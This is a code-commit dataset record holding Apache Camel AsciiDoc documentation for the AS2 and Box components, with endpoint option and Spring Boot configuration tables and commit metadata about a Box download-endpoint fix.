MUST contain the prefix *`client`*.\n\n[source]\n----\nas2:\/\/client\/method?[options]\n----\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption *`inBody`* that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format *`CamelAS2.<option>`*. 
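For example, a route could supply the *`subject`* option per message through such a header (a minimal sketch; the `direct:orders` endpoint name, the partner identifiers, and the simple expression are illustrative, not part of this component):\n\n[source,java]\n----\nfrom(\"direct:orders\")\n    \/\/ the CamelAS2.subject header supplies the subject option for this exchange\n    .setHeader(\"CamelAS2.subject\", simple(\"Order ${header.orderId}\"))\n    .to(\"as2:\/\/client\/send?inBody=ediMessage&as2From=mycompany&as2To=partner\");\n----\n\n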
Note that the *`inBody`* option\noverrides message header, i.e. the endpoint\noption *`inBody=option`* would override a *`CamelAS2.option`* header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be `null`.\nNote that the `null` value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of AS2 API errors the endpoint will throw a\nRuntimeCamelException with a\n*org.apache.http.HttpException* derived exception\ncause.\n\n[width=\"100%\",cols=\"10%,10%,70%\",options=\"header\"]\n|===\n|Method |Options |Result Body Type\n\n|send |ediMessage, requestUri, subject, from, as2From, as2To, as2MessageStructure, ediMessageContentType, ediMessageTransferEncoding, dispositionNotificationTo, signedReceiptMicAlgorithms |org.apache.http.protocol.HttpCoreContext\n|===\n\nURI Options for _client_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|ediMessage |String\n\n|requestUri |String\n\n|subject |String\n\n|from |String\n\n|as2From |String\n\n|as2To |String\n\n|as2MessageStructure |org.apache.camel.component.as2.api.AS2MessageStructure\n\n|ediMessageContentType |String\n\n|ediMessageTransferEncoding |String\n\n|dispositionNotificationTo |String\n\n|signedReceiptMicAlgorithms |String[]\n|===\n\n\n== Server Endpoints:\n\nServer endpoints use the endpoint prefix *`server`* followed by the name of a method\nand associated options described next. The endpoint URI MUST contain the prefix *`server`*.\n\n[source]\n----\nas2:\/\/server\/method?[options]\n----\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption *`inBody`* that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format *`CamelAS2.<option>`*. Note that the *`inBody`* option\noverrides message header, i.e. the endpoint\noption *`inBody=option`* would override a *`CamelAS2.option`* header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be `null`.\nNote that the `null` value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of AS2 API errors the endpoint will throw a\nRuntimeCamelException with a\n*org.apache.http.HttpException* derived exception\ncause.\n\n[width=\"100%\",cols=\"10%,10%,70%\",options=\"header\"]\n|===\n|Method |Options |Result Body Type\n\n|listen |requestUriPattern |org.apache.http.protocol.HttpCoreContext\n|===\n\nURI Options for _server_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|requestUriPattern |String\n|===\n\n","old_contents":"[[as2-component]]\n= AS2 Component\n\n*Since Camel 2.22*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe AS2 component provides transport of EDI messages using the HTTP transfer protocol\nas specified in https:\/\/tools.ietf.org\/html\/rfc4130[RFC4130]. \n\nNOTE: This component is currently a work in progress. 
Expect URI options and path and query parameters to change in future versions of this component.\n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-as2<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n== URI format\n\n[source]\n----\nas2:\/\/apiName\/methodName\n----\n\napiName can be one of:\n\n* client\n* server\n\n\n== AS2 Options\n\n\n\/\/ component options: START\nThe AS2 component supports 4 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | To use the shared configuration | | AS2Configuration\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n\n\/\/ endpoint options: START\nThe AS2 endpoint is configured using URI syntax:\n\n----\nas2:apiName\/methodName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (2 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiName* | *Required* What kind of operation to perform | | AS2ApiName\n| *methodName* | *Required* What sub operation to use for the selected operation | | String\n|===\n\n\n=== Query Parameters (49 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *as2From* (common) | The value of the AS2From header of AS2 message. | | String\n| *as2MessageStructure* (common) | The structure of AS2 Message. One of: PLAIN - No encryption, no signature, SIGNED - No encryption, signature, ENCRYPTED - Encryption, no signature, ENCRYPTED_SIGNED - Encryption, signature | | AS2MessageStructure\n| *as2To* (common) | The value of the AS2To header of AS2 message. | | String\n| *as2Version* (common) | The version of the AS2 protocol. | 1.1 | String\n| *clientFqdn* (common) | The Client Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *compressionAlgorithm* (common) | The algorithm used to compress EDI message. 
| | AS2CompressionAlgorithm\n| *decryptingPrivateKey* (common) | The key used to encrypt the EDI message. | | PrivateKey\n| *dispositionNotificationTo* (common) | The value of the Disposition-Notification-To header. Assigning a value to this parameter requests a message disposition notification (MDN) for the AS2 message. | | String\n| *ediMessageTransferEncoding* (common) | The transfer encoding of EDI message. | | String\n| *ediMessageType* (common) | The content type of EDI message. One of application\/edifact, application\/edi-x12, application\/edi-consent | | ContentType\n| *encryptingAlgorithm* (common) | The algorithm used to encrypt EDI message. | | AS2EncryptionAlgorithm\n| *encryptingCertificateChain* (common) | The chain of certificates used to encrypt EDI message. | | Certificate[]\n| *from* (common) | The value of the From header of AS2 message. | | String\n| *inBody* (common) | Sets the name of a parameter to be passed in the exchange In Body | | String\n| *mdnMessageTemplate* (common) | The template used to format MDN message | | String\n| *requestUri* (common) | The request URI of EDI message. | \/ | String\n| *server* (common) | The value included in the Server message header identifying the AS2 Server. | Camel AS2 Server Endpoint | String\n| *serverFqdn* (common) | The Server Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *serverPortNumber* (common) | The port number of server. | | Integer\n| *signedReceiptMicAlgorithms* (common) | The list of algorithms, in order of preference, requested to generate a message integrity check (MIC) returned in message dispostion notification (MDN) | | String[]\n| *signingAlgorithm* (common) | The algorithm used to sign EDI message. | | AS2SignatureAlgorithm\n| *signingCertificateChain* (common) | The chain of certificates used to sign EDI message. | | Certificate[]\n| *signingPrivateKey* (common) | The key used to sign the EDI message. | | PrivateKey\n| *subject* (common) | The value of Subject header of AS2 message. | | String\n| *targetHostname* (common) | The host name (IP or DNS name) of target host. | | String\n| *targetPortNumber* (common) | The port number of target host. -1 indicates the scheme default port. | | Integer\n| *userAgent* (common) | The value included in the User-Agent message header identifying the AS2 user agent. | Camel AS2 Client Endpoint | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. 
| | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component | none | String\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. 
| | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-as2-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 32 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.as2.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.as2.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.as2.configuration.api-name* | What kind of operation to perform | | AS2ApiName\n| *camel.component.as2.configuration.as2-from* | The value of the AS2From header of AS2 message. | | String\n| *camel.component.as2.configuration.as2-message-structure* | The structure of AS2 Message. One of: PLAIN - No encryption, no signature, SIGNED - No encryption, signature, ENCRYPTED - Encryption, no signature, ENCRYPTED_SIGNED - Encryption, signature | | AS2MessageStructure\n| *camel.component.as2.configuration.as2-to* | The value of the AS2To header of AS2 message. | | String\n| *camel.component.as2.configuration.as2-version* | The version of the AS2 protocol. | 1.1 | String\n| *camel.component.as2.configuration.client-fqdn* | The Client Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *camel.component.as2.configuration.compression-algorithm* | The algorithm used to compress EDI message. | | AS2CompressionAlgorithm\n| *camel.component.as2.configuration.decrypting-private-key* | The key used to encrypt the EDI message. | | PrivateKey\n| *camel.component.as2.configuration.disposition-notification-to* | The value of the Disposition-Notification-To header. Assigning a value to this parameter requests a message disposition notification (MDN) for the AS2 message. | | String\n| *camel.component.as2.configuration.edi-message-transfer-encoding* | The transfer encoding of EDI message. | | String\n| *camel.component.as2.configuration.edi-message-type* | The content type of EDI message. One of application\/edifact, application\/edi-x12, application\/edi-consent | | ContentType\n| *camel.component.as2.configuration.encrypting-algorithm* | The algorithm used to encrypt EDI message. 
| | AS2EncryptionAlgorithm\n| *camel.component.as2.configuration.encrypting-certificate-chain* | The chain of certificates used to encrypt EDI message. | | Certificate[]\n| *camel.component.as2.configuration.from* | The value of the From header of AS2 message. | | String\n| *camel.component.as2.configuration.mdn-message-template* | The template used to format MDN message | | String\n| *camel.component.as2.configuration.method-name* | What sub operation to use for the selected operation | | String\n| *camel.component.as2.configuration.request-uri* | The request URI of EDI message. | \/ | String\n| *camel.component.as2.configuration.server* | The value included in the Server message header identifying the AS2 Server. | Camel AS2 Server Endpoint | String\n| *camel.component.as2.configuration.server-fqdn* | The Server Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *camel.component.as2.configuration.server-port-number* | The port number of server. | | Integer\n| *camel.component.as2.configuration.signed-receipt-mic-algorithms* | The list of algorithms, in order of preference, requested to generate a message integrity check (MIC) returned in message dispostion notification (MDN) | | String[]\n| *camel.component.as2.configuration.signing-algorithm* | The algorithm used to sign EDI message. | | AS2SignatureAlgorithm\n| *camel.component.as2.configuration.signing-certificate-chain* | The chain of certificates used to sign EDI message. | | Certificate[]\n| *camel.component.as2.configuration.signing-private-key* | The key used to sign the EDI message. | | PrivateKey\n| *camel.component.as2.configuration.subject* | The value of Subject header of AS2 message. | | String\n| *camel.component.as2.configuration.target-hostname* | The host name (IP or DNS name) of target host. | | String\n| *camel.component.as2.configuration.target-port-number* | The port number of target host. -1 indicates the scheme default port. | | Integer\n| *camel.component.as2.configuration.user-agent* | The value included in the User-Agent message header identifying the AS2 user agent. | Camel AS2 Client Endpoint | String\n| *camel.component.as2.enabled* | Whether to enable auto configuration of the as2 component. This is enabled by default. | | Boolean\n| *camel.component.as2.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n== Client Endpoints:\n\nClient endpoints use the endpoint prefix *`client`* followed by the name of a method\nand associated options described next. The endpoint URI MUST contain the prefix *`client`*.\n\n[source]\n----\nas2:\/\/client\/method?[options]\n----\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. 
Producer endpoints can also use a special\noption *`inBody`* that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format *`CamelAS2.<option>`*. Note that the *`inBody`* option\noverrides message header, i.e. the endpoint\noption *`inBody=option`* would override a *`CamelAS2.option`* header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be `null`.\nNote that the `null` value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of AS2 API errors the endpoint will throw a\nRuntimeCamelException with a\n*org.apache.http.HttpException* derived exception\ncause.\n\n[width=\"100%\",cols=\"10%,10%,70%\",options=\"header\"]\n|===\n|Method |Options |Result Body Type\n\n|send |ediMessage, requestUri, subject, from, as2From, as2To, as2MessageStructure, ediMessageContentType, ediMessageTransferEncoding, dispositionNotificationTo, signedReceiptMicAlgorithms |org.apache.http.protocol.HttpCoreContext\n|===\n\nURI Options for _client_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|ediMessage |String\n\n|requestUri |String\n\n|subject |String\n\n|from |String\n\n|as2From |String\n\n|as2To |String\n\n|as2MessageStructure |org.apache.camel.component.as2.api.AS2MessageStructure\n\n|ediMessageContentType |String\n\n|ediMessageTransferEncoding |String\n\n|dispositionNotificationTo |String\n\n|signedReceiptMicAlgorithms |String[]\n|===\n\n\n== Server Endpoints:\n\nServer endpoints use the endpoint prefix *`server`* followed by the name of a method\nand associated options described next. The endpoint URI MUST contain the prefix *`server`*.\n\n[source]\n----\nas2:\/\/server\/method?[options]\n----\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption *`inBody`* that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format *`CamelAS2.<option>`*. Note that the *`inBody`* option\noverrides message header, i.e. 
the endpoint\noption *`inBody=option`* would override a *`CamelAS2.option`* header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be `null`.\nNote that the `null` value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of AS2 API errors the endpoint will throw a\nRuntimeCamelException with a\n*org.apache.http.HttpException* derived exception\ncause.\n\n[width=\"100%\",cols=\"10%,10%,70%\",options=\"header\"]\n|===\n|Method |Options |Result Body Type\n\n|listen |requestUriPattern |org.apache.http.protocol.HttpCoreContext\n|===\n\nURI Options for _server_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|requestUriPattern |String\n|===\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7249c5fcc5fcd05b6ab6018142d3a052dca1294","subject":"Change download previous file version endpoint (#2642)","message":"Change download previous file version endpoint (#2642)\n\nShorthand Alias will remain nonfunctional until changes are made on backend mapping.\n\nThe real working endpoint is downloadPreviousFileVersion (singular form), on backend downloadVersion is mapped with downloadPreviousFileVersions (plural form) which not exists.\n","repos":"gnodet\/camel,christophd\/camel,tdiesler\/camel,CodeSmell\/camel,cunningt\/camel,objectiser\/camel,CodeSmell\/camel,tadayosi\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,mcollovati\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,adessaigne\/camel,apache\/camel,alvinkwekel\/camel,Fabryprog\/camel,pax95\/camel,christophd\/camel,zregvart\/camel,kevinearls\/camel,tdiesler\/camel,CodeSmell\/camel,christophd\/camel,apache\/camel,nicolaferraro\/camel,ullgren\/camel,Fabryprog\/camel,pmoerenhout\/camel,davidkarlsen\/camel,pax95\/camel,gnodet\/camel,mcollovati\/camel,gnodet\/camel,pax95\/camel,alvinkwekel\/camel,kevinearls\/camel,ullgren\/camel,kevinearls\/camel,nikhilvibhav\/camel,ullgren\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,objectiser\/camel,christophd\/camel,Fabryprog\/camel,CodeSmell\/camel,apache\/camel,kevinearls\/camel,pax95\/camel,pax95\/camel,tadayosi\/camel,nicolaferraro\/camel,apache\/camel,adessaigne\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,cunningt\/camel,DariusX\/camel,zregvart\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,kevinearls\/camel,apache\/camel,tdiesler\/camel,punkhorn\/camel-upstream,zregvart\/camel,kevinearls\/camel,tdiesler\/camel,alvinkwekel\/camel,pmoerenhout\/camel,ullgren\/camel,mcollovati\/camel,christophd\/camel,Fabryprog\/camel,adessaigne\/camel,objectiser\/camel,mcollovati\/camel,pax95\/camel,pmoerenhout\/camel,zregvart\/camel,gnodet\/camel,pmoerenhout\/camel,DariusX\/camel,adessaigne\/camel,tdiesler\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,davidkarlsen\/camel,DariusX\/camel,tadayosi\/camel,pmoerenhout\/camel,objectiser\/camel,nikhilvibhav\/camel,gnodet\/camel,tdiesler\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel","old_file":"components\/camel-box\/camel-box-component\/src\/main\/docs\/box-component.adoc","new_file":"components\/camel-box\/camel-box-component\/src\/main\/docs\/box-component.adoc","new_contents":"[[box-component]]\n== Box Component\n\n*Available as of Camel version 2.14*\n\nThe Box component provides access to all of the Box.com APIs accessible\nusing 
https:\/\/github.com\/box\/box-java-sdk\/[https:\/\/github.com\/box\/box-java-sdk]. It\nallows producing messages to upload and download files, create, edit,\nand manage folders, etc. It also supports APIs that allow polling for\nupdates to user accounts and even changes to enterprise accounts, etc.\n\nBox.com requires the use of OAuth2.0 for all client application\nauthentication. In order to use camel-box with your account, you'll need\nto create a new application within Box.com at\nhttps:\/\/developer.box.com\/[https:\/\/developer.box.com].\nThe Box application's client id and secret will allow access to Box APIs\nwhich require a current user. A user access token is generated and\nmanaged by the API for an end user. \n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-box<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n----\n\n=== Connection Authentication Types\n\nThe Box component supports three different types of authenticated connections.\n\n==== Standard Authentication\n\n*Standard Authentication* uses the *OAuth 2.0 three-legged authentication process* to authenticate its connections with Box.com. This type of authentication enables Box *managed users* and *external users* to access, edit, and save their Box content through the Box component.\n\n==== App Enterprise Authentication\n\n*App Enterprise Authentication* uses the *OAuth 2.0 with JSON Web Tokens (JWT)* to authenticate its connections as a *Service Account* for a *Box Application*. This type of authentication enables a service account to access, edit, and save the Box content of its *Box Application* through the Box component.\n\n==== App User Authentication\n\n*App User Authentication* uses the *OAuth 2.0 with JSON Web Tokens (JWT)* to authenticate its connections as an *App User* for a *Box Application*. This type of authentication enables app users to access, edit, and save their Box content in its *Box Application* through the Box component.\n\n=== Box Options\n\n\/\/ component options: START\nThe Box component supports 2 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | To use the shared configuration | | BoxConfiguration\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\nThe Box endpoint is configured using URI syntax:\n\n----\nbox:apiName\/methodName\n----\n\nwith the following path and query parameters:\n\n==== Path Parameters (2 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiName* | *Required* What kind of operation to perform | | BoxApiName\n| *methodName* | *Required* What sub operation to use for the selected operation | | String\n|===\n\n\n==== Query Parameters (20 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *clientId* (common) | Box application client ID | | String\n| *enterpriseId* (common) | The enterprise ID to use for an App Enterprise. 
| | String\n| *inBody* (common) | Sets the name of a parameter to be passed in the exchange In Body | | String\n| *userId* (common) | The user ID to use for an App User. | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *httpParams* (advanced) | Custom HTTP params for settings like proxy host | | Map\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *accessTokenCache* (security) | Custom Access Token Cache for storing and retrieving access tokens. | | IAccessTokenCache\n| *clientSecret* (security) | Box application client secret | | String\n| *encryptionAlgorithm* (security) | The type of encryption algorithm for JWT. Supported Algorithms: RSA_SHA_256 RSA_SHA_384 RSA_SHA_512 | RSA_SHA_256 | EncryptionAlgorithm\n| *maxCacheEntries* (security) | The maximum number of access tokens in cache. | 100 | int\n| *authenticationType* (authentication) | The type of authentication for connection. Types of Authentication: STANDARD_AUTHENTICATION - OAuth 2.0 (3-legged) SERVER_AUTHENTICATION - OAuth 2.0 with JSON Web Tokens | APP_USER_AUTHENTICATION | String\n| *privateKeyFile* (security) | The private key for generating the JWT signature. | | String\n| *privateKeyPassword* (security) | The password for the private key. | | String\n| *publicKeyId* (security) | The ID for public key for validating the JWT signature. | | String\n| *sslContextParameters* (security) | To configure security using SSLContextParameters. | | SSLContextParameters\n| *userName* (security) | Box user name, MUST be provided | | String\n| *userPassword* (security) | Box user password, MUST be provided if authSecureStorage is not set, or returns null on first call | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n=== Spring Boot Auto-Configuration\n\n\nThe component supports 17 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.box.configuration.access-token-cache* | Custom Access Token Cache for storing and retrieving access tokens. | | IAccessTokenCache\n| *camel.component.box.configuration.api-name* | What kind of operation to perform | | BoxApiName\n| *camel.component.box.configuration.authentication-type* | The type of authentication for connection. 
Types of Authentication: STANDARD_AUTHENTICATION - OAuth 2.0 (3-legged) SERVER_AUTHENTICATION - OAuth 2.0 with JSON Web Tokens | APP_USER_AUTHENTICATION | String\n| *camel.component.box.configuration.client-id* | Box application client ID | | String\n| *camel.component.box.configuration.client-secret* | Box application client secret | | String\n| *camel.component.box.configuration.enterprise-id* | The enterprise ID to use for an App Enterprise. | | String\n| *camel.component.box.configuration.http-params* | Custom HTTP params for settings like proxy host | | Map\n| *camel.component.box.configuration.method-name* | What sub operation to use for the selected operation | | String\n| *camel.component.box.configuration.private-key-file* | The private key for generating the JWT signature. | | String\n| *camel.component.box.configuration.private-key-password* | The password for the private key. | | String\n| *camel.component.box.configuration.public-key-id* | The ID for public key for validating the JWT signature. | | String\n| *camel.component.box.configuration.ssl-context-parameters* | To configure security using SSLContextParameters. | | SSLContextParameters\n| *camel.component.box.configuration.user-id* | The user ID to use for an App User. | | String\n| *camel.component.box.configuration.user-name* | Box user name, MUST be provided | | String\n| *camel.component.box.configuration.user-password* | Box user password, MUST be provided if authSecureStorage is not set, or returns null on first call | | String\n| *camel.component.box.enabled* | Enable box component | true | Boolean\n| *camel.component.box.resolve-property-placeholders* | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n=== URI format\n\n[source]\n----\nbox:apiName\/methodName\n----\n\napiName can be one of:\n\n* collaborations\n* comments\n* event-logs\n* files\n* folders\n* groups\n* events\n* search\n* tasks\n* users\n\n\n=== Producer Endpoints:\n\nProducer endpoints can use endpoint prefixes followed by endpoint names\nand associated options described next. A shorthand alias can be used for\nsome endpoints. The endpoint URI MUST contain a prefix.\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption\u00a0*`inBody`*\u00a0that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format\u00a0*`CamelBox.<option>`*. Note that the\u00a0*`inBody`*\u00a0option\noverrides message header, i.e. 
